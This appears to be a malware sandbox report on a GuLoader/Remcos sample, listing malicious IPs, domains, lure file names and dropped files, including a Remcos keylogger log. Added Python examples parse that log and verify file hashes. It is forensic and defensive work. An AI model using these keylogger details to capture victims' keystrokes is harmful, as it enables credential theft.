• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Simulations (Time | Type | Description):
05:04:07 | API Interceptor | 35x Sleep call for process: powershell.exe modified
05:04:41 | API Interceptor | 2x Sleep call for process: svchost.exe modified
05:05:46 | API Interceptor | 86x Sleep call for process: msiexec.exe modified
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
212.162.149.91 | RFQ 008191.exe | malicious | Remcos, GuLoader | -
212.162.149.91 | order CF08093-24.exe | malicious | Remcos, GuLoader | -
178.237.33.50 | SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | BBVA S.A..vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | 7Sbq4gMMlp.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO_0099822111ORDER.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | requests-pdf.exe | malicious | Remcos | geoplugin.net/json.gp

Context: Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
fp2e7a.wpc.phicdn.net | JnEZtj3vtN.exe | malicious | PureCrypter | 192.229.221.95
fp2e7a.wpc.phicdn.net | YF3YnL4ksc.exe | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe | malicious | Metasploit | 192.229.221.95
fp2e7a.wpc.phicdn.net | credit.js | malicious | PureLog Stealer, RHADAMANTHYS | 192.229.221.95
fp2e7a.wpc.phicdn.net | support.Client.exe | malicious | ScreenConnect Tool | 192.229.221.95
fp2e7a.wpc.phicdn.net | file.exe | malicious | Remcos | 192.229.221.95
fp2e7a.wpc.phicdn.net | 66DJ2wErLz.exe | malicious | LummaC | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://flusoprano.com/f/4/0/f24b0aaf975ee65a83aae9b19316ec90.js | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | nSs9QIsTua.js | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | http://uhsee.com | malicious | Unknown | 192.229.221.95
geoplugin.net | SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | BBVA S.A..vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | 7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO_0099822111ORDER.js | malicious | Remcos | 178.237.33.50
geoplugin.net | requests-pdf.exe | malicious | Remcos | 178.237.33.50

Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNREAL-SERVERS (US) | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 162.251.122.87
UNREAL-SERVERS (US) | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 162.251.122.87
UNREAL-SERVERS (US) | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 162.251.122.87
UNREAL-SERVERS (US) | WO-663071 Sabiya Power Station Project.vbs | malicious | Remcos | 162.251.122.87
UNREAL-SERVERS (US) | RFQ 008191.exe | malicious | Remcos, GuLoader | 212.162.149.89
UNREAL-SERVERS (US) | purchase.order.exe | malicious | FormBook, GuLoader | 212.162.149.66
UNREAL-SERVERS (US) | Forhandlingsfriheden.exe | malicious | FormBook, GuLoader | 212.162.149.66
UNREAL-SERVERS (US) | order CF08093-24.exe | malicious | Remcos, GuLoader | 212.162.149.89
UNREAL-SERVERS (US) | PO. A-72 9234567.exe | malicious | FormBook, GuLoader | 212.162.149.89
UNREAL-SERVERS (US) | la.bot.arm7.elf | malicious | Mirai | 162.251.123.175
(The report lists the UNREAL-SERVERS group twice with identical rows; it is shown once here.)
ATOM86-ASATOM86 (NL) | SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86 (NL) | BBVA S.A..vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86 (NL) | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86 (NL) | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86 (NL) | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86 (NL) | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
ATOM86-ASATOM86 (NL) | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
ATOM86-ASATOM86 (NL) | 7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86 (NL) | PO_0099822111ORDER.js | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86 (NL) | requests-pdf.exe | malicious | Remcos | 178.237.33.50
Context: JA3 Fingerprints
No context
Context: Dropped Files
No context
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.7263298297673424
                                                            Encrypted:false
                                                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH07:9JZj5MiKNnNhoxuu
                                                            MD5:830A323FC6351DD098B803B500DA0D87
                                                            SHA1:1F9F9ED30F8091126CE2D6B09C1030A10ED1023F
                                                            SHA-256:9E2DE49DEB927EB523EA866530586BD2E9E79F1CEF5F682053C2D9D0E3E287B5
                                                            SHA-512:F1ACFC8FD4FA77E767FBF0D6425E74EADBA193278FA4A2B6F30AC7A829DDCDDAC4E9A2B0E952A72BB97358653CCF56CE1E11CD69125958EEB064A991B86E83CF
                                                            Malicious:false
                                                            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x2dd120c3, page size 16384, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.7556082225936612
                                                            Encrypted:false
                                                            SSDEEP:1536:FSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:FazaSvGJzYj2UlmOlOL
                                                            MD5:4C204BD985913415D6B93201D29C5B10
                                                            SHA1:F8AC7EB7BDCF5FB7046B172C4944461ED3A047CB
                                                            SHA-256:8AF3E2EBFA73CAECF3F750E293CE0D67835916D9B4F8267F177E0B47D131B94D
                                                            SHA-512:974005D6A0CC2D6BBC6207D4E1F30AC2087EB59DC1AF7ED564577299C5BAFAD711DF3B2C8815834EA8DD157A2202861D1C80185A9AF23B0DFC1A814D565A9DED
                                                            Malicious:false
                                                            Preview:-. .... .......7.......X\...;...{......................0.e......!...{?.)....|E.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................X?.)....|E..................H?.)....|E..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.07930059882242216
                                                            Encrypted:false
                                                            SSDEEP:3:cImXlKYe7pp03rfNaAPaU1lRM+lXalluxmO+l/SNxOf:4lKz7UDNDPaU7QgmOH
                                                            MD5:B8C05CEFC976339BC29632EC1010F210
                                                            SHA1:96718AA90F1EE1AAD4DA82F82F49E39AB9276FAB
                                                            SHA-256:DD682227924F2BE85770AA92B652E61BD35FC27B30C078CBAC5D65730FBA1E17
                                                            SHA-512:108B50D9AE7F93823E8F1FB4AC2770A990408E53729C787C576999C44D8B3F0818E8366CD82550F0B6AB3A08CB2C1E36E76CEE847505ED6D874CCE89E1F69550
                                                            Malicious:false
                                                            Preview:w.@......................................;...{..)....|E..!...{?..........!...{?..!...{?..g...!...{?..................H?.)....|E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):144
                                                            Entropy (8bit):3.3829237234308707
                                                            Encrypted:false
                                                            SSDEEP:3:rhlKlyKGlFSfVlwNUlWNqlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lZTfPwNUM4b5YcIeeDAlOWAv
                                                            MD5:85092DA2BA1F75488919E4EBC0759066
                                                            SHA1:9D397DD8771FE9C713C4F7DCAA8C798B1301785F
                                                            SHA-256:F15D3C13533417761C1FB6288CC4A22CC012D3091841E9093D7154EDFB4A4447
                                                            SHA-512:EBD8E8FFE5B08839BC2CEE1AC7AC5AA13A05973A0968FCF6FAD251F9886AA3E08F66B31C68DDD8D27202C509D9F499E4F69F12ECD9F9A36631ECCB7E1A98DF58
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                            Preview:....[.2.0.2.4./.1.2./.1.8. .0.5.:.0.5.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
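The logs.dat preview above is UTF-16LE text with CRLF line breaks; decoded, it reads `[2024/12/18 05:05:13 Offline Keylogger Started]` followed by the foreground window title `[Program Manager]`. The Python below is an added example for this report, not Remcos code and not part of Joe Sandbox: it decodes such a file and splits it into keylogger sessions and per-window entries. The two header lines are reconstructed from the preview (no BOM, leading CRLF), a layout that encodes to exactly the 144 bytes the report lists for the file. The `Untitled - Notepad` title and the `hello world` line are constructed for the demo, and the assumption that typed text follows a window-title line is mine, not something the report shows.

```python
"""Decode and structure a Remcos 'logs.dat' offline keylogger file.

Added example for this report, not Remcos code and not part of Joe Sandbox.
Layout used here: UTF-16LE without BOM, CRLF line breaks, a bracketed
"[YYYY/MM/DD HH:MM:SS <event>]" session header, bracketed window titles,
and (assumed) keystroke text on the lines that follow a window title.
"""
import re
from dataclasses import dataclass, field

# Reconstructed from the report's preview; encodes to the 144 bytes the report lists.
REPORT_PREVIEW_TEXT = (
    "\r\n[2024/12/18 05:05:13 Offline Keylogger Started]\r\n"
    "\r\n[Program Manager]\r\n"
)
REPORT_PREVIEW_BYTES = REPORT_PREVIEW_TEXT.encode("utf-16-le")

# Constructed continuation (window title and keystrokes are assumptions), demo only.
SAMPLE_LOGS_DAT = (
    REPORT_PREVIEW_TEXT
    + "\r\n[Untitled - Notepad]\r\n"
    + "hello world\r\n"
).encode("utf-16-le")

SESSION_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
WINDOW_RE = re.compile(r"^\[(.+)\]$")


@dataclass
class WindowEntry:
    title: str
    keystrokes: list = field(default_factory=list)


@dataclass
class Session:
    timestamp: str
    event: str
    windows: list = field(default_factory=list)


def decode_logs_dat(data: bytes) -> str:
    """UTF-16LE decode; tolerate a BOM in case some build writes one."""
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    return data.decode("utf-16-le", errors="replace")


def is_remcos_keylog(data: bytes) -> bool:
    """Cheap triage check for the session marker visible in the report's preview."""
    return "Offline Keylogger Started" in decode_logs_dat(data)


def parse_logs_dat(data: bytes) -> list:
    """Split the log into sessions, each holding window titles and the text typed in them."""
    sessions = []
    current = None
    for line in decode_logs_dat(data).split("\r\n"):
        if not line:
            continue
        m = SESSION_RE.match(line)
        if m:
            current = Session(timestamp=m.group(1), event=m.group(2))
            sessions.append(current)
            continue
        if current is None:
            # Text before any header: keep it rather than drop evidence.
            current = Session(timestamp="", event="(no session header)")
            sessions.append(current)
        m = WINDOW_RE.match(line)
        if m:
            current.windows.append(WindowEntry(title=m.group(1)))
        elif current.windows:
            current.windows[-1].keystrokes.append(line)
        else:
            current.windows.append(WindowEntry(title="(unknown window)", keystrokes=[line]))
    return sessions


if __name__ == "__main__":
    for s in parse_logs_dat(SAMPLE_LOGS_DAT):
        print(f"{s.timestamp} {s.event}")
        for w in s.windows:
            print(f"  [{w.title}] {' '.join(w.keystrokes)}")
```

Run it against a real C:\ProgramData\remcos\logs.dat pulled from a host and the first session header gives the time the keylogger started, which anchors the incident timeline; anything parsed as keystrokes under a browser or mail-client window title should be treated as leaked credentials.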
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):963
                                                            Entropy (8bit):5.018384957371898
                                                            Encrypted:false
                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                            MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                            SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                            SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                            SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                            Malicious:false
                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):53158
                                                            Entropy (8bit):5.062687652912555
                                                            Encrypted:false
                                                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                            MD5:5D430F1344CE89737902AEC47C61C930
                                                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                            Malicious:false
                                                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
Three further files dropped by the same powershell.exe process are byte-for-byte identical to the entry above: ASCII text with no line terminators, 60 bytes, entropy 4.038920595031593, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA1 6AB83620379FC69F80C0242105DDFFD7D98D5D9D, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, SHA-512 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82, not flagged malicious, same preview.
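To check a file recovered from a host against the fields the report prints for a dropped file (Size (bytes), Entropy (8bit), MD5, SHA1, SHA-256, SHA-512), the Python below recomputes them the same way: 8-bit Shannon entropy in bits per byte and upper-case hex digests. It is an added example, not part of the Joe Sandbox report. The sample bytes are the AppLocker probe file's content reconstructed from the preview above; the trailing space is an assumption, needed to reach the reported 60 bytes, and the reported entropy and hashes are reproduced exactly with it. The check generalizes to any of the dropped-file entries on this page once the reported values are copied into the dictionary.

```python
"""Recompute Joe Sandbox-style dropped-file metadata for a local copy of a file.

Added example, not part of the report. Fields mirror the report entries:
Size (bytes), Entropy (8bit) as bits per byte, and upper-case hex digests.
"""
import hashlib
import math
from collections import Counter

# Content of the 60-byte AppLocker probe file, reconstructed from the report's preview.
# The trailing space is an assumption: it is what brings the length to the reported 60 bytes.
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report's entry for that file.
REPORTED_APPLOCKER_PROBE = {
    "size": 60,
    "entropy": 4.038920595031593,
    "md5": "D17FE0A3F47BE24A6453E9EF58C94641",
    "sha1": "6AB83620379FC69F80C0242105DDFFD7D98D5D9D",
    "sha256": "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7",
    "sha512": "5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_metadata(data: bytes) -> dict:
    """The same fields the report prints for a dropped file."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def compare_to_report(data: bytes, reported: dict, entropy_tol: float = 1e-9) -> dict:
    """Map each reported field to True/False for whether the local bytes reproduce it."""
    local = file_metadata(data)
    result = {}
    for name, value in reported.items():
        if name == "entropy":
            result[name] = abs(local[name] - value) <= entropy_tol
        else:
            result[name] = local[name] == value
    return result


def mismatched_fields(data: bytes, reported: dict) -> list:
    """Fields where the local file disagrees with the report (empty list means identical)."""
    return [name for name, ok in compare_to_report(data, reported).items() if not ok]


if __name__ == "__main__":
    for name, value in file_metadata(APPLOCKER_PROBE).items():
        print(f"{name}: {value}")
    print("mismatches:", mismatched_fields(APPLOCKER_PROBE, REPORTED_APPLOCKER_PROBE))
```

Entropy alone separates the file classes on this page: the near-empty ESE databases sit around 0.1, the geoplugin JSON near 5.0, and a packed or encrypted payload would approach 8.0; a hash mismatch with a matching size and entropy usually means a single changed byte, such as a modified timestamp.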
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x48a80eb4, page size 32768, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):15728640
                                                            Entropy (8bit):0.10104014649099108
                                                            Encrypted:false
                                                            SSDEEP:1536:2SB2jpSB2jFSjlK/sw/ZweshzbOlqVqNes3zbtzbheszO/ZklMes1:2a6aCUueqUW9A6d
                                                            MD5:E796721168B5A15288B11EA0CF3FEAD1
                                                            SHA1:370A6B25D747D53E95DC4E42C0CE76E8F9C85748
                                                            SHA-256:6D7692842AC335C0F73B9FB100338D6895F6160197337695DC188F1D616E7461
                                                            SHA-512:0740529F4959CD2C9354B304C75EF4C8EDBF70F0C8D48076EBA95A7FFF171D07ECF67ABFEBFF48C28CCD17949D3F26CC381B60179B567B864360C2D09D2A6F46
                                                            Malicious:false
                                                            Preview:H...... ...................':...{........................T.....8+...{...,...{G.h.V.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{.......................................,...{G......................,...{G..........................#......h.V.....................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):13648769
                                                            Entropy (8bit):0.517599773961608
                                                            Encrypted:false
                                                            SSDEEP:6144:LzmTsySRVs5zFkrZnR460uPbZndDVeCH0hHjKbF6ovOWY15VeTNMuDYbfHkV2Fq3:f1AfkdnGl8bbHg+52LLV+MxzkV2
                                                            MD5:BBB44ACA44C77848759AE4FBEC7B4486
                                                            SHA1:7F1B1AB6523A582229AC322492558E3AF5B3D342
                                                            SHA-256:F1A4722EFC192D070AE79F67C25E4FC44D2D48CCD73464C632B5B6A8DCA6CF52
                                                            SHA-512:A58F33235847769E251E8771C4CACA4CA4C4F2FD5D304AD586A23FC0436AC4588FA8C40823623D449CD6A93D6E357BE1BADEA751C7BE7A8AC5590B446F71E6B5
                                                            Malicious:false
                                                            Preview:4'......,...................t...t.......V&.......'..........................Y...y...........................................................................................................................................................................................................G...J...............j...............................................................................................................................................3....4..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2
                                                            Entropy (8bit):1.0
                                                            Encrypted:false
                                                            SSDEEP:3:Qn:Qn
                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                            Malicious:false
                                                            Preview:..
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):328703
                                                            Entropy (8bit):7.624008519921244
                                                            Encrypted:false
                                                            SSDEEP:6144:szmTsySRVs5zFkrZnR460uPbZndDVeCH0hHjKbF6ovOWY15VeTNq:A1AfkdnGl8bbHg+52LLV+q
                                                            MD5:A7F9D7683A801E46E88E7326809863E3
                                                            SHA1:D2766E2B71F103611971CB924AF246DF6A947B59
                                                            SHA-256:ECC7C894A817724E4841B23FD23290C67BFABB1B7C5ED1073E3EE02697F6B2FD
                                                            SHA-512:6318DFDA7E0B4A7EEACD84375733CFF20C4830AE16C93B9E26DAB93E51BA87B87DE5121DDA86A2AFF880B0B68C824F388BEF90B478D6F67C4D0B78FDD0411EB6
                                                            Malicious:false
                                                            Preview:.............................+..........+.......BBB........................}}....Z.RR....W...........s..NNN..222..s.......F....X......q.....www.@@@@@@@@@.......^..................<<....aaaa............................i..........................xx.........?....Q...`..W..........eeee.ff.................8.............h..................$$$$$$$$$$$$$$$$$$$................S......6.................................&...........h...............................@@@.....PPP...c...........;..............((...x....................A.....AAA....................jjjjj.........8...e...............W........z.......^..._..................6........jj................1..A..........L........X......................{........................MMMM.................66......0000........$..............4.J..............s........0..N..TTT.......TTT.......uuuu...UUU.UU.....~..........''...:::...............e......[..............T....c..........))).>..........@.66....................::.\\..SS......EE..h................uuu.
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4978097
                                                            Entropy (8bit):0.1587330501431333
                                                            Encrypted:false
                                                            SSDEEP:768:oe1c3080LtMUV9O6Ivcs/3cwrp3F96u4PtAbY6NBQAGuwtNYq5jzP9qy2IccGm5q:Fh7Sx
                                                            MD5:E10E4A4F5E9C6C25F30E6F229F5941F3
                                                            SHA1:0CA6DF1C6FB3497E2A8D74F808CC0F23B3295A1F
                                                            SHA-256:CF6A84E24A1F2104FFC6D00058FE72BC8FAD5A36F982503E1A7F1AAFFBEDCDE9
                                                            SHA-512:B7059A1F3D6D19E465DF570A29CC0B233EBF5EFC1E2C07DDBAC71ADC747E1602326B63E93FFB39F1BBA5D300CF394472EED4E8FD28FEBC0E579964FB0EF136DB
                                                            Malicious:false
                                                            Preview:.......................................................................................................g.......................................................................................................................................................................................................................L..........................................................................................................................................................................................................................j................................................................................................................................................................................................................................................................................................................................ ................................................................................#...........................................................
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:ASCII text, with very long lines (395), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):539
                                                            Entropy (8bit):4.247606033101229
                                                            Encrypted:false
                                                            SSDEEP:12:qHRqobbnuuNQHpX2gBsLD0kcc+W8R2JT+JPrwIAu4HoW/Q3It:qxqobbnuuNQHpagkF8wUSBrIoQ4t
                                                            MD5:D11C07A55FF09B0A2E0C9BCF181DD969
                                                            SHA1:621D61F1A8F8574548334E4F732B04410E1A964D
                                                            SHA-256:495BFCF071659DDB9BC7783981E1BC6E8FCD2CE81C6C31895D68BF9919B7665E
                                                            SHA-512:54FE8BBBF9FF90F5B0F9CDA6784C3B6AB8FA2D163BDC3FCE39F1FA30ADB3691AF9968DC50AE40DA27F0E18DF952D22040ED9318A88E545672D048B42C94CC3B6
                                                            Malicious:false
                                                            Preview:ankelknoglers udraabstegns hyperhypocrisy constantinian roheryn unendeavored forfdre decks barnet endepunktsjusteringernes masochisms twiniest..unionisation spidsborgernes ukuransnedskrivningerne quiche bizarreriets chirps confessionist.marocain berrugate classicise johannesbrd copart knocks,slagters jarldoemme generalizability rkereaktionre slitteskrues khedive vitilitigate,sojaskraa decimalskilletegn fanebrereder magus echidnidae skarre.missilformularens aftagende recontracting ciffertasterne tydningerne fagstudienvnenes recepturs,
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3811024
                                                            Entropy (8bit):0.15926420403649424
